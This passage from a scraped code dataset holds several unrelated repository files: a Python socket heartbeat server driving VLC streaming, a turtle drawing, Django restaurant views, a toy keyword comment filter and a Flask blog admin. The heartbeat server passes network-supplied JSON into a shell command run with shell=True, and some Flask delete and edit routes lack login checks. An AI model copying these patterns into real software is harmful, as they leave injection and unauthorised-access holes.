WARNING\t30\t有意外,将来可能发生问题,但依然可用\n# INFO\t 20\t证明事情按预期工作\n# DEBUG\t 10\t详细信息,调试问题时会感兴趣\n\n# create logger with name\n# if not specified, it will be root\nlogger = logging.getLogger('pikaqiu')\nlogger.setLevel(logging.DEBUG)\n\n# create a handler, write to log.txt\n# logging.FileHandler(self, filename, mode='a', encoding=None, delay=0)\n# A handler class which writes formatted logging records to disk files.\nfileHandler = logging.FileHandler('heartbeat.log')\nfileHandler.setLevel(logging.INFO)\n\n# create another handler, for stdout in terminal\n# A handler class which writes logging records to a stream\nstreamHandler = logging.StreamHandler()\nstreamHandler.setLevel(logging.DEBUG)\n\n# set formatter\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s :%(message)s')\nfileHandler.setFormatter(formatter)\nstreamHandler.setFormatter(formatter)\n\n# add handler to logger\nlogger.addHandler(fileHandler)\nlogger.addHandler(streamHandler)\n\nclass HeartBeat(object):\n def __init__(self, local_ip,local_port,buffer_size=4096,listen_number=5):\n self.local_ip=local_ip\n self.local_port=local_port\n self.buffer_size=buffer_size\n #上线节点信息列表\n self.node_list=[]\n self.request_list=[]\n #当前路径\n self.current_path=os.path.abspath(\".\")\n logger.debug(self.current_path)\n \n self.receiveClient=True\n self.receiveUser=True\n self.stop=True\n try:\n self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #端口复用\n self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \n except socket.error as e:\n logger.critical(\"Error creating socket: %s\" %e)\n sys.exit()\n try:\n self.server.bind((self.local_ip, self.local_port))\n except socket.error as e:\n logger.critical('Error binding socket: %s' %e)\n sys.exit()\n logger.debug(\"Socket bind complete\")\n #设置��时接收的客户端最大请求数\n self.server.listen(listen_number)\n logger.debug(\"Socket now listening\")\n \n def get_nodeList(self):\n return self.node_list\n\n def receiveClientHeartBeat(self,sock,addr):\n logger.debug('Accept new connection from %s:%s...' % (addr[0],addr[1]))\n # 设置 recv 超时时间\n sock.setblocking(False)\n while self.receiveClient:\n try: \n ready = select.select([sock], [], [], 30)\n if ready[0]:\n data = sock.recv(self.buffer_size) \n tmp = json.loads(data) \n #type=0为心跳包,type=1为请求视频回执包\n #list为心跳包,dict为请求视频回执包\n if isinstance(tmp,list):\n self.node_list = tmp\n else:\n if tmp['upload'] == True:\n cmd = \"vlc --extraintf=http:logger --verbose=2 --file-logging --logfile=vlc-log.txt\"\n cmd+=\" file://%s/vlc/sdp/%s.sdp\"% (self.current_path, tmp['node'])\n cmd+=\" :sout='#transcode{vcodec=theo,vb=800,acodec=vorb,ab=128,channels=2,samplerate=44100,scodec=none}\"\n cmd+=\":http{dst=:%s/demo.ogg}'\" % (tmp['node']+8080)\n cmd+=\" :no-sout-all :sout-keep vlc://quit\"\n subprocess.Popen(cmd,shell=True)\n logger.debug(\"开始串流\")\n else :\n logger.debug(\"取消\")\n else:\n self.node_list=[]\n self.receiveClient=False\n self.receiveUser=False\n logger.debug('Connection from %s:%s timeout.' % addr)\n break\n # logger.debug(node_list)\n except socket.error as e:\n self.receiveClient=False\n self.receiveUser=False\n logger.critical(\"current %s:%s tcp connection error %s\" % (addr[0],addr[1],e))\n break\n sock.close()\n logger.debug('heartbeat Connection from %s:%s closed.' % addr)\n\n #向节点num请求视频\n def selectNode(self,num,call):\n #call true为请求网络视频 false为停止接收\n d = dict(node=num, port=8000+num*2, request=call)\n d_string=json.dumps(d)\n return d_string\n\n def receiveUserCommand(self,sock,addr):\n logger.debug('ready to request video from %s:%s...' % (addr[0],addr[1]))\n while self.receiveUser:\n try:\n #把已上线的节点传给网页服务器\n url = 'http://127.0.0.1:5000/nodelist'\n headers = {'Content-Type': 'application/json'}\n req=urllib2.Request(url,data=json.dumps(self.node_list),headers=headers)\n response = urllib2.urlopen(req)\n request_msg=response.read().decode('utf-8')\n if request_msg == 'ok':\n pass\n # logger.debug('Data:%s'% request_msg)# 获取服务器返回的页面信息 \n else :\n #寻找节点上传视频\n request = json.loads(request_msg)\n self.node_request=self.selectNode(request['node'],True)\n sock.send((self.node_request.decode('utf-8')).encode('utf-8'))\n except socket.error as e:\n logger.critical(\"current %s:%s tcp connection error %s\" % (addr[0],addr[1],e))\n break\n except urllib2.URLError as e:\n self.receiveClient=False\n self.receiveUser=False \n logger.debug('current page return error %s'% e.reason)\n break\n time.sleep(1)\n sock.close()\n logger.debug('command Connection from %s:%s closed.' % addr)\n\n #退出线程中断处理函数\n def quit(self, signum, frame):\n # logger.debug(\"Got signal: %s\" % signum)\n pass\n\n def stopHeartBeat(self):\n self.receiveClient=False\n self.receiveUser=False\n self.stop=False\n\n def start(self):\n while self.stop:\n try:\n sock, addr = self.server.accept()\n logger.debug(addr)\n self.receiveClient=True\n self.receiveUser=True\n t1 = threading.Thread(target=self.receiveClientHeartBeat, args=(sock, addr))\n t2 = threading.Thread(target=self.receiveUserCommand, args=(sock, addr))\n t1.setDaemon(True)\n t2.setDaemon(True)\n t1.start()\n t2.start()\n except KeyboardInterrupt :\n self.receiveClient=False\n self.receiveUser=False\n self.stop=False\n logger.error(\"Program interrupted by user.\")\n break\n self.server.close()\n logger.debug('server had stopped work')\nif __name__ == '__main__':\n heartbeat=HeartBeat(\"0.0.0.0\",6000)\n heartbeat.start()","repo_name":"Pokerpoke/aero-node","sub_path":"an-web/heart_beat.py","file_name":"heart_beat.py","file_ext":"py","file_size_in_byte":7486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3235345086","text":"from turtle import*\nimport colorsys as cs\n\nspeed(\"fastest\")\nbgcolor(\"black\")\nhideturtle()\n\nfor i in range(100):\n pencolor(cs.hsv_to_rgb(i/100,.6,1))\n right(i+1)\n circle(170,i)\n fd(i)\n right(90)\n \nexitonclick()","repo_name":"Deep-Look-Academy/Python-Turtle-Graphics","sub_path":"11. Turtle Graphics - draw the Amazing design.py","file_name":"11. Turtle Graphics - draw the Amazing design.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26536722265","text":"import json\n\nfrom .models import *\nfrom user.models import Review, Review_image, Review_Star\nfrom user.utils import login_decorator\n\nfrom django.views import View\nfrom django.db.models import Avg\nfrom django.http import JsonResponse, HttpResponse\n\nclass TopTopic(View):\n def get(self, request, topic_id):\n\n try:\n topic_top_list = Topic_Top_list.objects.select_related('topic', 'top_list').filter(topic__id = topic_id)\n topic_title = topic_top_list[0].topic.title\n\n toplists = [{\n 'id' : toplist.top_list.id,\n 'title' : toplist.top_list.title,\n 'description' : toplist.top_list.description,\n 'image' : toplist.top_list.image\n } for toplist in topic_top_list ]\n\n return JsonResponse({'title' : topic_title, 'top_list' : toplists}, status=200)\n except Topic.DoesNotExist:\n return JsonResponse({'result' : 'DOES_NOT_EXIST_TOPIC'}, status = 400)\n\nclass RestaurantView(View):\n def get(self, request, topic_id):\n restaurants = Topic_Restaurant.objects.select_related('topic','restaurant').filter(topic_id = topic_id)\n\n if restaurants.exists(): \n topic_title = restaurants[0].topic.title\n restaurant_list= [{\n 'id' : element.restaurant.id,\n 'name' : element.restaurant.name,\n 'state' : element.restaurant.location_state.state,\n 'food' : element.restaurant.food.category,\n 'image' : element.restaurant.restaurant_image_set.get(restaurant_id = element.restaurant.id).images,\n 'grade' : element.restaurant.review_set.filter(restaurant_id = element.restaurant.id).values('review_star__star').aggregate(avg=Avg('review_star__star'))['avg']\n } for element in restaurants]\n return JsonResponse({\"title\" : topic_title, \"restaurant_list\" : restaurant_list}, status=200)\n else:\n return JsonResponse({\"message\":\"DOES_NOT_EXIST_TOPIC\"}, status = 400)\n\n\nclass DetailTopImage(View):\n def get(self, request, restaurant_id):\n image = Restaurant_image.objects.filter(restaurant_id = restaurant_id).values_list('images', flat=True)\n\n return JsonResponse({'image' : list(image)})\n\nclass RestaurantDetailInfoView(View):\n def get(self, request, restaurant_id):\n try:\n restaurant = Restaurant.objects.select_related('price_range', 'food', 'location_city', 'location_state', 'location_road', 'holiday').prefetch_related('menu_set','restaurant_info_set').get(id=restaurant_id)\n\n restaurant_top = {\"name\": restaurant.name, \"star\": restaurant.review_set.filter(restaurant_id = restaurant.id).values('review_star__star').aggregate(avg=Avg('review_star__star'))['avg']}\n title_dict = { \"parking\":\"주차\", \"number\":\"전화번호\", \"last_order\":\"마지막주문\", \"site\":\"웹 사이트\", \"breaktime\":\"쉬는시간\", \"opening_hours\":\"영업시간\"}\n\n result = []\n # address\n result.append({\n \"title\" : \"주소\",\n \"content\" : ['{} {} {} {}'.format(restaurant.location_city.city, restaurant.location_state.state, restaurant.location_road.road, restaurant.location_detail)] \n })\n # food\n result.append({\n \"title\" : \"음식 종류\",\n \"content\" : [restaurant.food.category]\n })\n # price\n result.append({\n \"title\" : \"가격대\",\n \"content\" : [restaurant.price_range.price_range]\n })\n # holiday\n result.append({\n \"title\" : \"휴일\",\n \"content\" : [restaurant.holiday.holiday] \n })\n \n info = restaurant.restaurant_info_set.values().get(restaurant_id = restaurant_id)\n for element in info :\n if element in title_dict and info[element] != None :\n result.append({\"title\" : title_dict[element], \"content\" : [info[element]]})\n\n # menu\n result.append({\n \"title\" : \"메뉴\",\n \"content\" : [\n {\n \"menu\" : element.menu,\n \"price\" : element.price \n }\n for element in restaurant.menu_set.filter(restaurant_id=restaurant_id) ]\n })\n\n return JsonResponse({\"top\": restaurant_top, \"result\":result}, status = 200)\n except Restaurant.DoesNotExist:\n return HttpResponse(status = 404)\n\nclass RestaurantDetailToplistView(View):\n def get(self, request, restaurant_id):\n toplists = Top_lists_Restaurant.objects.select_related('top_list', 'restaurant').filter(restaurant_id=restaurant_id)\n\n if toplists.exists():\n toplist = [\n {\n \"id\" : element.top_list.id,\n \"title\" : element.top_list.title,\n \"description\" : element.top_list.description,\n \"image\" : element.top_list.image\n } for element in toplists]\n return JsonResponse({\"result\" : toplist}, status = 200)\n else:\n return HttpResponse(status = 404)\n\nclass DetailReview(View):\n def get(self,request, restaurant_id):\n\n offset = request.GET.get('offset',0)\n limit = request.GET.get('limit', 5)\n review_star = request.GET.get('taste', 4)\n\n restaurant_review = Review.objects.select_related('user','review_star').prefetch_related('review_image_set').filter(restaurant_id = restaurant_id)\n \n if review_star == 4:\n restaurant_rate = restaurant_review.order_by('-create_at')\n else:\n restaurant_rate = restaurant_review.filter(review_star_id = review_star).order_by('-create_at')\n\n reviews = [\n {\n 'name' : review.user.nick_name,\n 'rating' : review.review_star.content,\n 'text' : review.content,\n 'imglist' : list(review.review_image_set.values_list('image', flat=True)),\n 'time' : str(review.create_at.year) + '-' + \n str(review.create_at.month) + '-' + \n str(review.create_at.day)\n }\n for review in list(restaurant_rate[int(offset):int(limit)])]\n\n return JsonResponse(\n {\n 'total_count' : restaurant_rate.count(),\n 'good_count' : restaurant_rate.filter(review_star_id = 1).count(),\n 'soso_count' : restaurant_rate.filter(review_star_id = 2).count(),\n 'bad_count' :restaurant_rate.filter(review_star_id = 3).count(),\n 'result' : reviews\n }\n )\n \n @login_decorator\n def post(self, request, restaurant_id):\n data = json.loads(request.body)\n user = request.user\n \n Review(\n user = user,\n restaurant_id = data[\"restaurant_id\"],\n content = data[\"content\"],\n review_star = Review_Star.objects.get(content = data[\"star\"])\n ).save()\n return HttpResponse(status = 200)\n\nclass RestaurantNearView(View):\n def get(self, request, restaurant_id):\n try:\n location_state = Restaurant.objects.get(id = restaurant_id).location_state\n around_restaurant = Restaurant.objects.select_related('food','location_state','price_range').prefetch_related('restaurant_image_set','review_set').filter(location_state_id = location_state.id)\n\n restaurants = [\n {\n 'id' : restaurant.id,\n 'title' : restaurant.name,\n 'food' :restaurant.food.category,\n 'price' : restaurant.price_range.price_range,\n 'location' : restaurant.location_state.state,\n 'img' : restaurant.restaurant_image_set.values('images')[0],\n 'avg' : restaurant.review_set.filter(restaurant_id = restaurant.id).values('review_star__star').aggregate(avg=Avg('review_star__star'))['avg']\n }\n for restaurant in list(around_restaurant)[:4]]\n\n return JsonResponse({'result' : restaurants}, status = 200)\n except Restaurant.DoesNotExist:\n return JsonResponse({\"message\":\"DOES_NOT_EXIST_RESTAURANT\"}, status = 400)\n\nclass RestaurantDetailToplistRelatedView(View):\n def get(self, request, restaurant_id):\n try:\n toplist_id = Top_lists_Restaurant.objects.filter(restaurant_id=restaurant_id).select_related('top_list').order_by('top_list__create_at')[0].top_list_id\n restaurants = Top_lists_Restaurant.objects.select_related('top_list','restaurant').filter(top_list_id = toplist_id)[:4]\n toplist_title = restaurants[0].top_list.title\n\n restaurant_list = [{\n 'id' : element.restaurant.id,\n 'name' : element.restaurant.name,\n 'state' : element.restaurant.location_state.state,\n 'food' : element.restaurant.food.category,\n 'image' : element.restaurant.restaurant_image_set.get(restaurant_id = element.restaurant.id).images,\n 'grade' : element.restaurant.review_set.filter(restaurant_id = element.restaurant.id).values('review_star__star').aggregate(avg=Avg('review_star__star'))['avg']\n } for element in restaurants]\n\n return JsonResponse({\"title\" : toplist_title, \"restaurant_list\" : restaurant_list}, status=200)\n\n except IndexError:\n return HttpResponse(status = 400)\n\nclass RestaurantTagview(View):\n def get(self, request, restaurant_id):\n\n restaurant_tags = Restaurant_Tag.objects.select_related('restaurant','tag').filter(restaurant_id = restaurant_id)\n tags = [\n { \n 'id' : tag.tag.id,\n 'tag' : tag.tag.tag\n }\n for tag in restaurant_tags]\n\n return JsonResponse({'result' : tags}, status = 200)\n\nclass RestaurantEatDealView(View):\n def get(self,request):\n \n offset = int(request.GET.get('offset', 0))\n limit = int(request.GET.get('limit', 20))\n\n eat_deal_list = Eat_Deal.objects.select_related('restaurant')[offset * limit:(offset + 1) * limit]\n eat_deals = [\n {\n 'offset' : offset,\n 'eat_deal_id' :eat_deal.id,\n 'title' : eat_deal.restaurant.name,\n 'restaurant_id' : eat_deal.restaurant.id,\n 'image' : list(eat_deal.restaurant.restaurant_image_set.values('images'))[0],\n 'menu' : eat_deal.menu,\n 'discount_rate' : eat_deal.discount_rate,\n 'price' : int(eat_deal.price),\n 'discounted_price' : int(eat_deal.price) - (int(eat_deal.price) * int(eat_deal.discount_rate)/100)\n }\n for eat_deal in list(eat_deal_list)]\n\n return JsonResponse({'result' : eat_deals}, status=200)\n\nclass RestaurantEatDealSearchView(View):\n def get(self, request):\n\n eat_deal_list = request.GET.getlist('list')\n\n offset = int(request.GET.get('offset', 0))\n limit = int(request.GET.get('limit', 20))\n\n eat_deal_list = Eat_Deal.objects.select_related('restaurant').filter(restaurant__location_state__in = eat_deal_list)[offset * limit:(offset + 1) * limit]\n eat_deals = [\n {\n 'offset' : offset,\n 'eat_deal_id' :eat_deal.id,\n 'title' : eat_deal.restaurant.name,\n 'restaurant_id' : eat_deal.restaurant.id,\n 'image' : list(eat_deal.restaurant.restaurant_image_set.values('images'))[0],\n 'menu' : eat_deal.menu,\n 'discount_rate' : eat_deal.discount_rate,\n 'price' : int(eat_deal.price),\n 'discounted_price' : int(eat_deal.price) - (int(eat_deal.price) * int(eat_deal.discount_rate)/100)\n }\n for eat_deal in list(eat_deal_list)]\n\n return JsonResponse({'result' : eat_deals}, status=200)\n\nclass SearchView(View):\n def get(self, request):\n data = request.GET.get('text', None)\n\n restaurants = Restaurant.objects.filter(name__icontains = data)\n result = [restaurant.name for restaurant in restaurants]\n\n return JsonResponse({\"result\":result}, status =200)\n\nclass SearchFinalView(View):\n def get(self, request, text):\n restaurants = Restaurant.objects.select_related('food', 'location_city', 'location_state', 'location_road').filter(name__icontains = text)\n\n if restaurants.exists(): \n restaurant_list= [{\n 'id' : element.id,\n 'name' : element.name,\n 'state' : element.location_state.state,\n 'address': '{} {} {} {}'.format(element.location_city.city, element.location_state.state, element.location_road.road, element.location_detail),\n 'food' : element.food.category,\n 'image' : element.restaurant_image_set.filter(restaurant_id = element.id)[0].images,\n 'grade' : element.review_set.filter(restaurant_id = element.id).values('review_star__star').aggregate(avg=Avg('review_star__star'))['avg']\n } for element in restaurants]\n return JsonResponse({\"restaurant_list\" : restaurant_list}, status=200)\n else:\n return JsonResponse({\"message\":\"VALUE_DOES_NOT_EXIST\"}, status = 400)\n\nclass RestaurantEatDealDetail(View):\n def get(self, request, eat_deal_id):\n try:\n eat_deal_detail = Eat_Deal.objects.select_related('restaurant').get(id = eat_deal_id)\n date = eat_deal_detail.end_date - eat_deal_detail.start_date\n eat_deal_data = {\n 'eat_deal_id' : eat_deal_detail.id,\n 'image' : list(eat_deal_detail.restaurant.restaurant_image_set.values('images'))[0],\n 'title' : eat_deal_detail.restaurant.name,\n 'menu' : eat_deal_detail.menu,\n 'menu_info' : eat_deal_detail.menu_info,\n 'restaurant_id' : eat_deal_detail.restaurant.id,\n 'restaurant_info' : eat_deal_detail.restaurant_intro,\n 'start_date' : str(eat_deal_detail.start_date.year) + '-' + \n str(eat_deal_detail.start_date.month) + '-' + \n str(eat_deal_detail.start_date.day),\n 'end_date' : str(eat_deal_detail.end_date.year) + '-' + \n str(eat_deal_detail.end_date.month) + '-' + \n str(eat_deal_detail.end_date.day),\n 'price' : int(eat_deal_detail.price),\n 'discount_rate' : eat_deal_detail.discount_rate,\n 'discounted_price' : int(eat_deal_detail.price) - (int(eat_deal_detail.price) * int(eat_deal_detail.discount_rate)/100),\n 'remaining_date' : date.days\n }\n return JsonResponse({'result' : eat_deal_data}, status = 200)\n except Eat_Deal.DoesNotExist:\n return JsonResponse({'result' :'DOES_NOT_EXIST_EAT_DEAL'}, status=404)\n\nclass RestaurantEatDealLocationCategoryView(View):\n def get(self, request):\n try:\n city = request.GET.get('city', 13)\n location_states = Location_city.objects.prefetch_related('location_state_set').get(id = city)\n\n states = [\n {\n 'id' : state['id'],\n 'state' : state['state']\n }\n for state in list(location_states.location_state_set.values())]\n\n return JsonResponse({'result' : states}, status = 200)\n \n except Location_city.DoesNotExist:\n return JsonResponse({'result' : 'DOES_NOT_EXIST_EAT_DEAL_LOCATION'}, status=404)\n\nclass ToplistView(View):\n def get(self, request):\n offset = int(request.GET.get('offset', 0))\n limit = int(request.GET.get('limit', 20))\n\n toplists = Top_List.objects.order_by('-create_at')[offset * limit : (offset+1) * limit]\n \n toplist = [{\n \"id\" : element.id,\n \"image\" : element.image,\n \"title\" : element.title,\n \"description\" : element.description\n } for element in toplists]\n return JsonResponse({\"toplists\": toplist, \"offset\" : offset+1}, status = 200)\n\n\nclass ToplistDetailView(View):\n def get(self, request, toplist_id):\n offset = int(request.GET.get('offset', 0))\n limit = int(request.GET.get('limit', 20))\n\n top_restaurants = Top_lists_Restaurant.objects.select_related('top_list', 'restaurant').filter(top_list_id = toplist_id)[ offset * limit : (offset+1) * limit]\n \n if top_restaurants.exists():\n toplist = {\n \"id\" : toplist_id,\n \"title\" : top_restaurants[0].top_list.title,\n \"description\" : top_restaurants[0].top_list.description,\n \"created_at\" : top_restaurants[0].top_list.create_at.strftime('%Y-%m-%d')\n }\n restaurants = [{\n \"id\" : element.restaurant.id,\n \"name\" : element.restaurant.name,\n \"address\" : '{} {} {} {}'.format(element.restaurant.location_city.city, element.restaurant.location_state.state, element.restaurant.location_road.road, element.restaurant.location_detail),\n \"image\" : element.restaurant.restaurant_image_set.filter(restaurant_id=element.restaurant_id)[0].images,\n \"user_image\" : 'https://s3-ap-northeast-2.amazonaws.com/mp-seoul-image-production/873410_1562147913864', \n \"user_nickname\" : element.restaurant.review_set.filter(restaurant_id=element.restaurant_id)[0].user.nick_name,\n \"user_review\" : element.restaurant.review_set.filter(restaurant_id=element.restaurant_id)[0].content\n } for element in top_restaurants]\n\n return JsonResponse({\"toplist\": toplist, \"restaurants\": restaurants, \"offset\":offset+1}, status = 200)\n else:\n return HttpResponse(status = 404)\n\nclass RestaurantDetailEatDealView(View):\n def get(self, request, restaurant_id):\n \n restaurant = Restaurant.objects.prefetch_related('eat_deal_set','restaurant_image_set').get(id = restaurant_id)\n \n restaurant_eat_deal = [\n {\n 'eat_deal_id' : eat_deal['id'],\n 'menu' : eat_deal['menu'],\n 'image' : list(restaurant.restaurant_image_set.values('images'))[0],\n 'price' : int(eat_deal['price']),\n 'discount_rate' : eat_deal['discount_rate'],\n 'discounted_price' : int(eat_deal['price']) - (int(eat_deal['price']) * int(eat_deal['discount_rate'])/100)\n }\n for eat_deal in list(restaurant.eat_deal_set.values())]\n\n return JsonResponse({'result' : restaurant_eat_deal}, status = 200)","repo_name":"nameunji/project_wegoplate_backend","sub_path":"restaurant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9848761089","text":"\r\nclass Comment:\r\n def __init__(self,data,type = 'normal'):\r\n self.type = type\r\n self.string = data\r\n\r\n ranks = {}\r\n categories = []\r\n def rank(self,rule):\r\n words = self.string.split(\" \")\r\n\r\n for word in words:\r\n\r\n if word in rule.words:\r\n\r\n if self.ranks.get(rule.type) is None:\r\n self.ranks[rule.type] = 1\r\n else:\r\n self.ranks[rule.type] += 1\r\n\r\n if self.ranks[rule.type] >= rule.minWords and rule.type not in self.categories:\r\n self.categories.append(rule.type)\r\n\r\n\r\nclass Rule:\r\n def __init__(self,words,type = 'spam',minWords = 1):\r\n print(self,words,type)\r\n self.type = type\r\n self.words = words\r\n self.minWords = minWords\r\n\r\nclass Filter:\r\n def __init__(self,rules,name = 'normal'):\r\n self.name = name\r\n self.rules = rules\r\n def filter(self,comments):\r\n toRemove = []\r\n for comment in comments:\r\n for rule in self.rules:\r\n comment.rank(rule)\r\n if len(comment.categories):\r\n toRemove.append(comment)\r\n\r\n for comment in toRemove:\r\n comments.remove(comment)\r\n return comments,toRemove\r\n\r\nrule1 = Rule(['boobs','ass'],'porn')\r\nrule2 = Rule(['win','iphone'],'spam')\r\n\r\nrules = [rule1,rule2]\r\n\r\ncomments = [Comment('I love egypt'),Comment('I love ass'),Comment('win 2 Phone'), Comment('win iphone')]\r\nfilter = Filter(rules,'spam and porn')\r\nprint([comment.string for comment in filter.filter(comments)[0]])\r\n","repo_name":"oknashar/interview-preparation","sub_path":"amazonPY/On-site/comment-Filter-System.py","file_name":"comment-Filter-System.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"610763135","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask, render_template, request, flash, session, redirect, url_for, jsonify\nfrom models import db, Articulos, User, Categorias, Tag, tags\nfrom os import getenv\nfrom werkzeug.security import check_password_hash\nfrom werkzeug import secure_filename\nfrom time import time\nfrom math import ceil\n\n\n# Iniciar\napp = Flask(__name__)\n\n# Config\napp.config['DEBUG'] = True\n\n# Database\napp.config['SQLALCHEMY_DATABASE_URI'] = getenv('DATABASE_URL')\napp.config['SECRET_KEY'] = getenv('SECRET_KEY')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['MAX_CONTENT_LENGTH'] = 1 * 1024 * 1024\napp.config['ALLOWED_EXTENSIONS'] = set(['jpg', 'png'])\ndb.init_app(app)\n\n@app.route(\"/\")\ndef blog_all():\n mis_articulos = Articulos.query.order_by(Articulos.id.desc()).all()\n # Calculamos el numero maximo de paginas del paginador\n max_pags = ceil(len(mis_articulos) / 5)\n return render_template(\n 'web/blog/all.html',\n articulos=mis_articulos,\n max_pags=max_pags\n ) \n\n@app.route(\"/articulo//\")\ndef blog_articulo(id):\n # Para coger el articulo por su id\n mi_articulo = Articulos.query.get(id)\n # Select from User where id = mi_articulo.user_id\n mi_autor = User.query.get(mi_articulo.user_id)\n mi_categoria = Categorias.query.get(mi_articulo.categoria_id)\n return render_template(\n 'web/blog/articulo.html',\n articulo=mi_articulo,\n autor=mi_autor.username,\n categoria=mi_categoria.name\n )\n\n@app.route(\"/admin/login/\", methods=['GET', 'POST'])\ndef admin_login():\n if request.method=='POST':\n my_user = User.query.filter_by(email=request.form['email']).first()\n if my_user and check_password_hash(my_user.password, request.form['password']):\n flash('Bienvenido', 'info')\n session['id'] = my_user.id\n return redirect(url_for('admin_articulos'))\n else:\n flash('Tu email o la contraseña no es correcto', 'danger')\n return render_template('web/admin/login.html')\n\n@app.route(\"/admin/articulos/\")\ndef admin_articulos():\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n # Obtenems todos los articulos\n articulos = Articulos.query.order_by(Articulos.id.desc()).all()\n return render_template('web/admin/articulos.html', articulos=articulos)\n\n@app.route(\"/admin/articulos/nuevo\", methods=['GET', 'POST'])\ndef admin_nuevo_articulo():\n # Comprobamos si tiene sesion\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n # Guardamos datos del formulario\n if request.method == 'POST':\n titulo = request.form['titulo']\n contenido = request.form['contenido']\n categoria = request.form['categoria']\n mis_tags = request.form.getlist('tags')\n usuario= session['id']\n # Guaardar en la base de datos\n nuevo_articulo = Articulos()\n nuevo_articulo.title = titulo\n nuevo_articulo.text = contenido\n nuevo_articulo.categoria_id = categoria\n nuevo_articulo.user_id = usuario\n for tag in mis_tags:\n mi_temp_tag = Tag.query.get(tag)\n nuevo_articulo.tags.append(mi_temp_tag)\n # Guardamos imagen\n try:\n f = request.files['portada']\n nombre = str(int(time())) + f.filename\n f.save('static/uploads/' + secure_filename(nombre))\n nuevo_articulo.portada = nombre\n except:\n flash('No se ha subido la imagen de portada', 'danger')\n db.session.add(nuevo_articulo)\n db.session.commit()\n # Mostramos informacion al usuario\n flash('Articulo creado', 'primary')\n # Obtenems todos las categorias\n categorias = Categorias.query.all()\n # Obtenemos los tags\n tags=Tag.query.all()\n return render_template('web/admin/nuevo_articulo.html', \n categorias=categorias,\n tags=tags\n )\n\n@app.route(\"/admin/categorias/\")\ndef admin_categorias():\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n # Obtenems todos los articulos\n categorias = Categorias.query.all()\n return render_template('web/admin/categorias.html', categorias=categorias)\n\n@app.route(\"/admin/categorias/nueva\", methods=['GET', 'POST'])\ndef admin_nueva_categoria():\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n if request.method == 'POST':\n categoria = request.form['nombre']\n # Guardamos la categoria en la base de datos\n nueva_categoria = Categorias()\n nueva_categoria.name = categoria\n db.session.add(nueva_categoria)\n db.session.commit()\n # Mostramos informacion al usuario\n flash('Categoria creada', 'primary')\n return redirect(url_for(\"admin_categorias\"))\n # Obtenems todos los articulos\n categorias = Categorias.query.all()\n return render_template('web/admin/nueva_categoria.html', categorias=categorias)\n\n@app.route('/articulo/borrar', methods=['POST'])\ndef borrar_articulo():\n if request.method == 'POST':\n articulo_id_borrar = request.form['articulo-borrar']\n # Borramos de la base de datos\n Articulos.query.filter_by(id=articulo_id_borrar).delete()\n db.session.commit()\n flash('Articulo borrado correctamente', 'success')\n return redirect(url_for('admin_articulos'))\n\n@app.route('/articulo/actualizar/', methods=['GET', 'POST'])\ndef editar_articulo(id):\n # PRotegemos nuestra pagina\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n # Consultamos la base de datos\n mi_articulo = Articulos.query.get(id)\n if request.method == 'POST':\n titulo = request.form['titulo']\n contenido = request.form['contenido']\n categoria = request.form['categoria']\n mis_tags = request.form.getlist('tags')\n usuario= session['id']\n # Guaardar en la base de datos\n mi_articulo.title = titulo\n mi_articulo.text = contenido\n mi_articulo.categoria_id = categoria\n mi_articulo.user_id = usuario\n for tag in mis_tags:\n mi_temp_tag = Tag.query.get(tag)\n nuevo_articulo.tags.append(mi_temp_tag)\n # Guardamos imagen\n try:\n f = request.files['portada']\n if f.filename:\n nombre = str(int(time())) + f.filename\n f.save('static/uploads/' + secure_filename(nombre))\n mi_articulo.portada = nombre\n except:\n flash('No se ha subido la imagen de portada', 'danger')\n db.session.add(mi_articulo)\n db.session.commit()\n # Mostramos informacion al usuario\n flash('Articulo creado', 'primary')\n # Obtenems todos las categorias\n categorias = Categorias.query.all()\n # Obtenemos los tags\n tags=Tag.query.all()\n return render_template('web/admin/editar_articulo.html', \n categorias=categorias,\n tags=tags,\n articulo=mi_articulo\n )\n\n@app.route('/categoria/borrar', methods=['POST'])\ndef borrar_categoria():\n if request.method == 'POST':\n # Obtenemos la id\n categoria_id_borrar = request.form['categoria-borrar']\n # Borramos de la base de datos\n Categorias.query.filter_by(id=categoria_id_borrar).delete()\n db.session.commit()\n # Marcamos la categoria por defecto para los articulos\n articulos = Articulos.query.filter_by(categoria_id=categoria_id_borrar).all()\n for articulo in articulos:\n articulo.categoria = Categorias.query.first()\n db.session.add(articulo)\n # Informamos al usuario\n flash('Categoría borrada correctamente', 'success')\n return redirect(url_for('admin_categorias'))\n\n@app.route('/categoria/editar/', methods=['GET', 'POST'])\ndef editar_categoria(id):\n # Consultamos la base de datos\n mi_categoria = Categorias.query.get(id)\n # Actualizar\n if request.method == 'POST':\n nombre = request.form['nombre']\n mi_categoria.name = nombre\n db.session.add(mi_categoria)\n db.session.commit()\n flash('Categoria actualizada', 'success')\n return redirect(url_for('admin_categorias'))\n # Renderizamos\n return render_template(\n 'web/admin/editar_categoria.html',\n categoria = mi_categoria\n )\n\n@app.route(\"/admin/tags/\")\ndef admin_tags():\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n # Obtenems todos los articulos\n tags = Tag.query.all()\n return render_template('web/admin/tags.html', tags=tags)\n\n@app.route(\"/admin/tags/nueva\", methods=['GET', 'POST'])\ndef admin_nuevo_tag():\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n if 